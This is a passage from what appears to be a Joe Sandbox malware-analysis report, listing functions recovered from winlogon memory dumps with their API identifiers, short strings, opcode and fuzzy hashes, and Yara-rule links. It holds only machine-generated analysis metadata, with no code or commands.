                                                                                                                                  Function 000002E991751AD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FinalHandleNamePathlstrlen
                                                                                                                                  • String ID: \\?\
                                                                                                                                  • API String ID: 2719912262-4282027825
                                                                                                                                  • Opcode ID: 8ec5aa73b904ba0ae152e0023bf61817b040c34d1fdb6eca25b3f21a7418f015
                                                                                                                                  • Instruction ID: 359bdb5b04c3225f745abc8a69f3b7e02b5b5e1f753234cdc2aa4f5a950f78f2
                                                                                                                                  • Opcode Fuzzy Hash: 8ec5aa73b904ba0ae152e0023bf61817b040c34d1fdb6eca25b3f21a7418f015
                                                                                                                                  • Instruction Fuzzy Hash: 7BF04F623446C692EB208F22F89C7596360F744BC9F89402ADA4986956DF7CC6DCCF20
                                                                                                                                  Function 000002E99175B6C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                  • Opcode ID: 22aa5c619ebc81d22d9dfbe7be1db06b78379459a7dd84903556244d0fd23091
                                                                                                                                  • Instruction ID: 862487bc266be579d6c9f321a7951f7f78359e3cc0a5998e0da864649902d709
                                                                                                                                  • Opcode Fuzzy Hash: 22aa5c619ebc81d22d9dfbe7be1db06b78379459a7dd84903556244d0fd23091
                                                                                                                                  • Instruction Fuzzy Hash: 85F0BB6134078241EB104B26E88C3695321FB857E0F99071F9969865F6DF3CC4C8CF71
                                                                                                                                  Function 000002E9917534D8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CombinePath
                                                                                                                                  • String ID: \\.\pipe\
                                                                                                                                  • API String ID: 3422762182-91387939
                                                                                                                                  • Opcode ID: 546a660c3a3c5793cfedcc045940b0098f6ff5b56a36a36c93076b4998a23383
                                                                                                                                  • Instruction ID: 035155f4cc83c878695633274c7f2ffd50dc090718db677e28309cd7c0195185
                                                                                                                                  • Opcode Fuzzy Hash: 546a660c3a3c5793cfedcc045940b0098f6ff5b56a36a36c93076b4998a23383
                                                                                                                                  • Instruction Fuzzy Hash: 9FF08260754BC282EA108B63F91C1196220BB48FC4F499036EE1687B2ADF3CC4C58B21
                                                                                                                                  Function 000002E991755C10 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2882836952-0
                                                                                                                                  • Opcode ID: 815ee21ffe9adbfe8221b97827463395eede3ec7a1cf187d7ac650129b8d7587
                                                                                                                                  • Instruction ID: 601c773764bc98a367ba765dc01450b04cffc877769f5dcb6522a495bab0c77c
                                                                                                                                  • Opcode Fuzzy Hash: 815ee21ffe9adbfe8221b97827463395eede3ec7a1cf187d7ac650129b8d7587
                                                                                                                                  • Instruction Fuzzy Hash: ED619B36159B86C7EB608F16E49832AB7E4F389B44F51411AFA8D87BA5DB7CC580CF10
                                                                                                                                  Function 000002E991758A60 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 2395640692-1018135373
                                                                                                                                  • Opcode ID: c05350e615053b7500426fc17c40756232b0b69f88985873800782e1d6faf427
                                                                                                                                  • Instruction ID: bb7a7e30f8fc35d84cb5f917594f7a0b4b805a5f92cb1cb94f81acb43bbf32ac
                                                                                                                                  • Opcode Fuzzy Hash: c05350e615053b7500426fc17c40756232b0b69f88985873800782e1d6faf427
                                                                                                                                  • Instruction Fuzzy Hash: B651E6323526828BEB54CF17E44CB6C7396F344B98F16812ADA5A4778ADB79C8C1CF10
                                                                                                                                  Function 000002E991729C6C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000003.1460673433.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_3_2e991720000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                  • String ID: csm$csm
                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                  • Opcode ID: 74794b81e2150fdd3247c6b0929cf94a133a79a7c698cea2745a4c727450e9e7
                                                                                                                                  • Instruction ID: a3edbc22f02ea1d7e0d25e42e84e664146ea1d8d60159786b5737df5a0863b3f
                                                                                                                                  • Opcode Fuzzy Hash: 74794b81e2150fdd3247c6b0929cf94a133a79a7c698cea2745a4c727450e9e7
                                                                                                                                  • Instruction Fuzzy Hash: EE518E332452D28AEB748F23D44836877A0F754B94F1A491BDA9947BD6CB34D8D2CF21
                                                                                                                                  Function 000002E99175A86C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                  • String ID: csm$csm
                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                  • Opcode ID: 74794b81e2150fdd3247c6b0929cf94a133a79a7c698cea2745a4c727450e9e7
                                                                                                                                  • Instruction ID: f8002cd5164244d4fdbc573aad52d47fef258c689792972c93fe9be7402ab2b7
                                                                                                                                  • Opcode Fuzzy Hash: 74794b81e2150fdd3247c6b0929cf94a133a79a7c698cea2745a4c727450e9e7
                                                                                                                                  • Instruction Fuzzy Hash: C2519D362802C28AEB748F23D54836977A0F354B94F16412FEA9947BD6CB38D5D1CF21
                                                                                                                                  Function 000002E99175A4BC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                  • Opcode ID: 422e28baaeae7ac14bcee333ee3501689d432e8c3f34beb3876b8884b2d0f2c3
                                                                                                                                  • Instruction ID: cc70e37fd81b4bb2fc0d3d265740deaa4150f5d14d40f51702e48695acbe4227
                                                                                                                                  • Opcode Fuzzy Hash: 422e28baaeae7ac14bcee333ee3501689d432e8c3f34beb3876b8884b2d0f2c3
                                                                                                                                  • Instruction Fuzzy Hash: AE61CF32508BC585EB208F16E44479ABBA0F785B88F05462AEB8903B9ACB7CC1D0CF10
                                                                                                                                  Function 000002E991753720 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileNameProcess$CloseFindHandleImageOpenPathlstrlen
                                                                                                                                  • String ID: pid_
                                                                                                                                  • API String ID: 4193868204-4147670505
                                                                                                                                  • Opcode ID: 6ea48c97d0836b8524b32f86ee4346f1c82ecd9c2f2f8412e357fece5ccf2637
                                                                                                                                  • Instruction ID: 9738be600728a272bc1629d2a6033316c47fab5129db49f355ed0aacbe005793
                                                                                                                                  • Opcode Fuzzy Hash: 6ea48c97d0836b8524b32f86ee4346f1c82ecd9c2f2f8412e357fece5ccf2637
                                                                                                                                  • Instruction Fuzzy Hash: 6911D6613547C351FB509B27E84835963A4F744780F82082AEE59C3AA6EF78C9D5CB30
                                                                                                                                  Function 000002E991761D68 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2718003287-0
                                                                                                                                  • Opcode ID: 1e5131369e73c8b0b3a82c3b3899f962dfdd68d3e046a9ea647a68590475b17d
                                                                                                                                  • Instruction ID: 979a5fc11aa4990d04fb00ba0fb59c403a9749a4564e295e3ad538058d39aab2
                                                                                                                                  • Opcode Fuzzy Hash: 1e5131369e73c8b0b3a82c3b3899f962dfdd68d3e046a9ea647a68590475b17d
                                                                                                                                  • Instruction Fuzzy Hash: 18D1FF32758B8589E750CFA6D4482DC37B1F354BD8F41421ACE4EA7B9ADA34C486CB51
                                                                                                                                  Function 000002E9917514A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$Free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3168794593-0
                                                                                                                                  • Opcode ID: c2c0360827517a06e8d0680bc42561039c20425810adeb3802ef81e067c22a51
                                                                                                                                  • Instruction ID: 49898b590e67b505099a33910b5f9d59a6108652a88092cd6afda640260e5630
                                                                                                                                  • Opcode Fuzzy Hash: c2c0360827517a06e8d0680bc42561039c20425810adeb3802ef81e067c22a51
                                                                                                                                  • Instruction Fuzzy Hash: 4A012972650BD1C6E708DF67E80C14977A1F789FC4B0A442ADE4A93729DF34D491CB50
                                                                                                                                  Function 000002E9917626B4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002E99176269F), ref: 000002E9917627D2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleMode
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4145635619-0
                                                                                                                                  • Opcode ID: fd23e56fc5cd1019f1e5392f0e1397cafcae10da8a00d9ee5e5162c1d6a2f59c
                                                                                                                                  • Instruction ID: e7a960eedc558b4e1d89b4393649b64ad697125be812c4343ef3ab901cc01062
                                                                                                                                  • Opcode Fuzzy Hash: fd23e56fc5cd1019f1e5392f0e1397cafcae10da8a00d9ee5e5162c1d6a2f59c
                                                                                                                                  • Instruction Fuzzy Hash: 1D91D2327506D285FB948B67D8587AD3BA0B354BC8F45410FDE4AA7B96CB38C4C5CB22
                                                                                                                                  Function 000002E991757E50 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                  • Opcode ID: f835b8e08e75b66adb0c80a9203c172f2f025c961cbdb54561531f30ab1cb5f4
                                                                                                                                  • Instruction ID: 347410499891c68e914b47b101c2a2c2440ac89b599fb4da8834854f9c000fab
                                                                                                                                  • Opcode Fuzzy Hash: f835b8e08e75b66adb0c80a9203c172f2f025c961cbdb54561531f30ab1cb5f4
                                                                                                                                  • Instruction Fuzzy Hash: A4115E22750F428AEF00CF61E8583A833A4F7197A8F450E2AEE6D867A5DF78C194C750
                                                                                                                                  Function 000002E9917524F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileType
                                                                                                                                  • String ID: \\.\pipe\
                                                                                                                                  • API String ID: 3081899298-91387939
                                                                                                                                  • Opcode ID: f8c31f6540fb76418ba81280ca63f5f7a8befbb637495ae6adf665db7b557686
                                                                                                                                  • Instruction ID: 51c3a5ebdc8659fd29fdfa7c113ec8a60fc1af55160e96b1737cba5982c5f491
                                                                                                                                  • Opcode Fuzzy Hash: f8c31f6540fb76418ba81280ca63f5f7a8befbb637495ae6adf665db7b557686
                                                                                                                                  • Instruction Fuzzy Hash: E571B0362847C286E765DE27D8483E967A5F389784F56002BDE4A43B9ADF34C681CB60
                                                                                                                                  Function 000002E9917527D4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileType
                                                                                                                                  • String ID: \\.\pipe\
                                                                                                                                  • API String ID: 3081899298-91387939
                                                                                                                                  • Opcode ID: 8dea155f3f19a94179284ebfe6d1d35a52e64b2762c8427805ec0788098b2eca
                                                                                                                                  • Instruction ID: 42dbe6e92a8350891c591b0f780508e73b9a6fb98d72209de96eea736cbaa1f2
                                                                                                                                  • Opcode Fuzzy Hash: 8dea155f3f19a94179284ebfe6d1d35a52e64b2762c8427805ec0788098b2eca
                                                                                                                                  • Instruction Fuzzy Hash: 357194323807C386E775AE67D8483AA67A5F3897C4F56001BDD0A53B9ADF34C6858B60
                                                                                                                                  Function 000002E991727E60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000003.1460673433.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_3_2e991720000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 3242871069-1018135373
                                                                                                                                  • Opcode ID: c05350e615053b7500426fc17c40756232b0b69f88985873800782e1d6faf427
                                                                                                                                  • Instruction ID: ce6399ee167b38c2359973d9212e56a99976a3dfd493039b186ea1d59cddc047
                                                                                                                                  • Opcode Fuzzy Hash: c05350e615053b7500426fc17c40756232b0b69f88985873800782e1d6faf427
                                                                                                                                  • Instruction Fuzzy Hash: 8851C9313566829AEB64CF17E448B6C33D1F354B88F16891AEE5643746D77AD8C3CB20
                                                                                                                                  Function 000002E9917298BC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000003.1460673433.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_3_2e991720000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallTranslator
                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                  • API String ID: 3163161869-2084237596
                                                                                                                                  • Opcode ID: 9bdaa800d01c6c5a185cdc55968300698a35ff746a3365fefcfd6d909ecc6556
                                                                                                                                  • Instruction ID: 0fe269d98857b2c3fda9527fd856ec23eac356f162e6d8906f79756ed98f1c81
                                                                                                                                  • Opcode Fuzzy Hash: 9bdaa800d01c6c5a185cdc55968300698a35ff746a3365fefcfd6d909ecc6556
                                                                                                                                  • Instruction Fuzzy Hash: 0461A072505BC581EB608F16E4447AAB7A0F785B94F09461AEB8903B9ACB78C1D1CF10
                                                                                                                                  Function 000002E991762420 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
